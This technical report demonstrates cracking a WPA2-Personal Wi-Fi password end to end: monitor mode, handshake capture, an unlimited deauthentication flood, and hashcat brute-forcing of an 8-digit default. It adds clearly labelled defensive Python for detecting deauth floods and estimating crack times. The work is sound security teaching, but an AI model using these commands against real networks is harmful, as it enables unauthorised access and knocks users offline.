This is a technical report showcasing how easy it is for an attacker to crack a Wi-Fi password and connect to a router. The idea starts from the fact that 72% of people do not change their default Wi-Fi password [1]. While some people do change their default Wi-Fi passwords, there is an article [2] stating that 3,633 out of 5,000 routers (72.66%) use passwords made up of 8-10 digits or eight lowercase letters. This is easy to brute-force with the computing power available today. The following sections demonstrate the steps used to compromise a newly acquired router whose default password has not been changed.
The first requirement is a wireless adapter. Although most computers include a built-in network card, Kali Linux running in a VM detects it as an Ethernet adapter [3]. Therefore we can’t switch the Wi-Fi card from managed mode (device communicates only with router) to monitor mode (device is not connected to router but can monitor all packets from all devices sent in a given range) [4].
For a simple, reliable network adapter, I chose to go with the TP-Link TL-WN722N (David Bombal has a very nice video [5] on how to install it if you have a v2/v3 as is the case for me).
First, attach the network adapter by going to "Devices > USB > Realtek 802.11n NIC".
Then we check which "mode" the adapter is in. We want it to be in monitor mode.
To enable monitor mode, we do this:
sudo airmon-ng start wlan0
To scan for nearby wireless networks we can do this:
sudo airodump-ng wlan0
This reveals information such as the BSSID (MAC address of the AP), the channel and the encryption type; in the lower part we see things like Stations (devices searching for an AP to connect with):
We’re interested only in the BSSID and the channel. For a full description of every column, check the airodump-ng page [6].
BSSID: MAC address of the access point. In the Client section, a BSSID of “(not associated)” means that the client is not associated with any AP. In this unassociated state, it is searching for an AP to connect with.
CH: Channel number (taken from beacon packets).
Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference or overlapping channels.
Then we must find the router that we are interested in (in my case it's WiFi-Test) and note the BSSID and the channel. With this info we can now run:
sudo airodump-ng --bssid BSSID -c 5 --write capture wlan0
(replace BSSID with the router’s MAC address and the value after -c with its channel, here channel 5; --write capture writes the capture files with the prefix "capture")
This command intercepts any authentication handshake between the router and a user. Now there are two options:
- wait for someone to connect to the network
- use a deauthentication attack in order to make everyone reconnect, thus intercepting a WPA2 handshake [7].
We will continue with the second option. Now in one terminal window I have the capture command running and in another one I will run a deauth attack (a deauthentication attack sends deauthentication packets to one or more stations/clients connected to an AP).
sudo aireplay-ng --deauth 0 -a BSSID wlan0
--deauth 0 - sends an unlimited stream of deauthentication frames to every station associated with the specified AP until the process is stopped
-a BSSID - the MAC address of the access point (the BSSID noted above)
Looking in the first window we can see that we have captured a handshake.
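From the defender’s side, the deauthentication step above is the noisiest part of the whole procedure: a spoofed flood carries the AP’s own BSSID and arrives at a rate no real access point produces. The following Python example is added here and is not part of the original report. It decodes the 2-byte 802.11 Frame Control field into the same type_subtype numbering that Wireshark’s wlan.fc.type_subtype uses, then flags any BSSID that emits more deauthentication frames per second than a configurable threshold. The frame records, MAC addresses and the threshold of 20 frames per second are all constructed for the demonstration and are assumptions to tune per environment.

```python
from collections import defaultdict
from dataclasses import dataclass

# 802.11 management-frame subtypes (type 0) in Wireshark's wlan.fc.type_subtype numbering
BEACON = 0x08
DEAUTH = 0x0C


def type_subtype(frame_control: bytes) -> int:
    """Decode the little-endian 2-byte Frame Control field into Wireshark's
    type_subtype value ((type << 4) | subtype). In the first byte, bits 0-1
    are the protocol version, bits 2-3 the type and bits 4-7 the subtype."""
    b0 = frame_control[0]
    ftype = (b0 >> 2) & 0x3
    subtype = (b0 >> 4) & 0xF
    return (ftype << 4) | subtype


@dataclass(frozen=True)
class Frame:
    ts: float    # capture timestamp in seconds
    fc: bytes    # raw 2-byte Frame Control field
    bssid: str   # BSSID / transmitter of the management frame
    dst: str     # receiver address


def deauth_floods(frames, window_s=1.0, threshold=20):
    """Return {bssid: peak deauth count} for every BSSID that sent more than
    `threshold` deauthentication frames inside any `window_s`-second window.
    A real AP deauthenticates a client now and then; dozens per second
    (especially to the broadcast address) only happen under a flood."""
    per_bssid = defaultdict(list)
    for f in frames:
        if type_subtype(f.fc) == DEAUTH:
            per_bssid[f.bssid].append(f.ts)
    flagged = {}
    for bssid, times in per_bssid.items():
        times.sort()
        peak = start = 0
        for end, t in enumerate(times):
            while t - times[start] > window_s:   # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[bssid] = peak
    return flagged


# --- constructed sample capture (not real traffic) -------------------------
DEAUTH_FC = b"\xc0\x00"   # type 0 (management), subtype 12 (deauthentication)
BEACON_FC = b"\x80\x00"   # type 0 (management), subtype 8 (beacon)
AP = "AA:BB:CC:DD:EE:FF"          # constructed BSSID
CLIENT = "11:22:33:44:55:66"      # constructed station
BROADCAST = "FF:FF:FF:FF:FF:FF"


def sample_frames():
    frames = [Frame(0.1024 * i, BEACON_FC, AP, BROADCAST) for i in range(30)]  # ~3 s of beacons
    frames.append(Frame(0.5, DEAUTH_FC, AP, CLIENT))                            # one legitimate deauth
    # 50 broadcast deauths in half a second: the signature of a deauth flood
    frames += [Frame(1.0 + 0.01 * i, DEAUTH_FC, AP, BROADCAST) for i in range(50)]
    return frames


if __name__ == "__main__":
    for bssid, peak in deauth_floods(sample_frames()).items():
        print(f"ALERT deauth flood from {bssid}: {peak} frames in 1 s")
```

Rate-based detection like this is a monitoring control; the actual fix is 802.11w Protected Management Frames (PMF, mandatory in WPA3), under which a deauthentication frame that is not integrity-protected with the session key is simply discarded by the client, so the handshake cannot be forced this way.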
We are left with these files:
Several tools can perform brute-force attacks (Aircrack-ng, Hashcat, or John the Ripper). This demonstration uses Hashcat since it can run the brute force on a GPU rather than the CPU.
To do this, the .cap capture must first be converted into a format Hashcat can read. First we clean the capture a bit with the following (optional) command:
tshark -r capture.cap -R "(wlan.fc.type_subtype == 0x00 || wlan.fc.type_subtype == 0x02 || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x05 || wlan.fc.type_subtype == 0x08 || eapol)" -2 -F pcapng -w stripped.pcapng
-r capture.cap - set the input file
-R - read filter applied to the packets (|| is the logical operator for "OR")
wlan.fc.type_subtype == 0x00 - filter for management frames with subtype 0 (Association Request)
wlan.fc.type_subtype == 0x02 - filter for management frames with subtype 2 (Reassociation Request)
wlan.fc.type_subtype == 0x04 - filter for management frames with subtype 4 (Probe Request)
wlan.fc.type_subtype == 0x05 - filter for management frames with subtype 5 (Probe Response)
wlan.fc.type_subtype == 0x08 - filter for management frames with subtype 8 (Beacon)
eapol - filter for eapol frames
-2 - two-pass analysis (required when using -R)
-F pcapng - pcapng output format
-w stripped.pcapng - set the output file to stripped.pcapng
This is an optional step that removes the noise from the traffic capture and keeps only the necessary packets. It helps in reducing brute-forcing time.
Then we convert the .pcapng file into hash mode 22000 so that Hashcat can read it:
hcxpcapngtool -o hash.hc22000 -E wordlist stripped.pcapng
-o hash.hc22000 - write the extracted hashes in Hashcat 22000 format
-E wordlist - also write any ESSIDs and other strings found in the capture to a wordlist file
Now that we have the hash, we can use Hashcat to brute-force the password, knowing that most (72.66%) basic router passwords have 8, 9, or 10 digits (or eight lowercase letters):
.\hashcat.exe -m 22000 .\hash.hc22000 -a 3 -d 1 ?d?d?d?d?d?d?d?d
-m 22000 - specifies the hash type
.\hash.hc22000 - specifies the name of the hash
-a 3 - specifies the attack-mode (3 means brute-force)
-d 1 - specifies which device (GPU) to use (in my case #1 was my dedicated GPU and #2 was my integrated GPU)
?d?d?d?d?d?d?d?d - specifies the mask to brute-force (in this case every combination of 8 digits, 10^8 = 100,000,000 candidates)
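To turn the mask above into numbers a defender can base a password policy on, here is an added Python example (not from the report) that parses hashcat’s mask syntax and computes the keyspace and the worst-case exhaustive search time. It goes slightly beyond the single 8-digit mask of the report by handling the ?d, ?l, ?u, ?s and ?a charsets generally. The candidate rate it assumes is derived from the report’s own run, 10^8 candidates finished within 6 min 32 s (392 s), which gives a lower bound of roughly 255,000 candidates per second for that GPU; on other hardware this rate is an assumption that should be measured, not guessed.

```python
# hashcat mask charsets handled here (?b/?h/?H and custom ?1-?4 are left out)
CHARSETS = {
    "d": 10,  # ?d digits 0-9
    "l": 26,  # ?l lowercase a-z
    "u": 26,  # ?u uppercase A-Z
    "s": 33,  # ?s printable punctuation and space
    "a": 95,  # ?a = ?l?u?d?s, all printable ASCII
}

# Lower bound on the candidate rate observed in the report: 10^8 eight-digit
# candidates were exhausted at the latest after 6 min 32 s = 392 s. Assumption:
# replace with a measured rate (hashcat -b) for other hardware.
RATE_FROM_REPORT = 10**8 / 392


def keyspace(mask: str) -> int:
    """Count the candidates an exhaustive run of a hashcat mask enumerates.
    Each ?x token multiplies by its charset size; a literal character (or an
    escaped '??') contributes exactly one possibility."""
    total, i = 1, 0
    while i < len(mask):
        if mask[i] != "?":
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        tok = mask[i + 1]
        if tok == "?":          # '??' is a literal question mark
            pass
        elif tok in CHARSETS:
            total *= CHARSETS[tok]
        else:
            raise ValueError(f"unsupported mask token ?{tok}")
        i += 2
    return total


def worst_case_seconds(mask: str, rate: float = RATE_FROM_REPORT) -> float:
    """Time to try every candidate of `mask` at `rate` candidates per second."""
    return keyspace(mask) / rate


def describe(seconds: float) -> str:
    """Render a duration in the largest sensible unit."""
    for unit, size in (("years", 365 * 86400), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:,.1f} seconds"


def policy_table(masks, rate=RATE_FROM_REPORT):
    """Return (mask, keyspace, worst-case seconds) per mask so a policy
    decision can be read straight off the numbers."""
    return [(m, keyspace(m), worst_case_seconds(m, rate)) for m in masks]


if __name__ == "__main__":
    rows = policy_table([
        "?d" * 8,    # 8 digits, the report's case
        "?d" * 10,   # 10 digits, still a common default scheme
        "?l" * 8,    # eight lowercase letters
        "?a" * 12,   # 12 printable-ASCII characters
    ])
    for mask, ks, secs in rows:
        print(f"{mask:28} {ks:>26,} candidates  worst case {describe(secs)}")
```

At the report’s rate the table shows 8 digits falling in minutes, 10 digits in about half a day and eight lowercase letters in about ten days, while 12 printable-ASCII characters would take on the order of 10^10 years. The usable policy conclusion is that the keyspace, not the character count, decides whether a captured WPA2 handshake is crackable offline.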
The password was cracked in just 6 minutes 32 seconds.
Many people either keep the default password or replace it with an equally weak one (8-10 digits or eight lowercase letters). This report has demonstrated how easy it is to crack such a Wi-Fi network protected with WPA2-Personal using minimal equipment (a network adapter) and just a few tools.
[1] Arooj Ahmed, 2024 Router Security: Only 28% Change WiFi Passwords, Down From 35% in 2022, URL: https://www.digitalinformationworld.com/2024/09/2024-router-security-only-28-change.html
[2] Ido Hoorvitch, Cracking WiFi at Scale with One Simple Trick, URL: https://www.cyberark.com/resources/threat-research-blog/cracking-WiFi-at-scale-with-one-simple-trick
[3] N00b Ed, Connecting a Wireless Adapter to a Kali Linux Virtual Machine, URL: https://nooblinux.com/connecting-a-wireless-adapter-to-kali-linux-virtual-machine/
[4] GeeksforGeeks, Modes of Wireless Connectivity, URL: https://www.geeksforgeeks.org/modes-of-wireless-connectivity/
[5] David Bombal, Kali Linux TP-Link TL-WN722N install (1 command fix), URL: https://www.youtube.com/watch?v=-xkpgvjuEy0
[6] Aircrack-ng, Airodump-ng, URL: https://www.aircrack-ng.org/doku.php?id=airodump-ng
[7] NetworkLessons, WPA and WPA2 4-Way Handshake, URL: https://networklessons.com/wireless/wpa-and-wpa2-4-way-handshake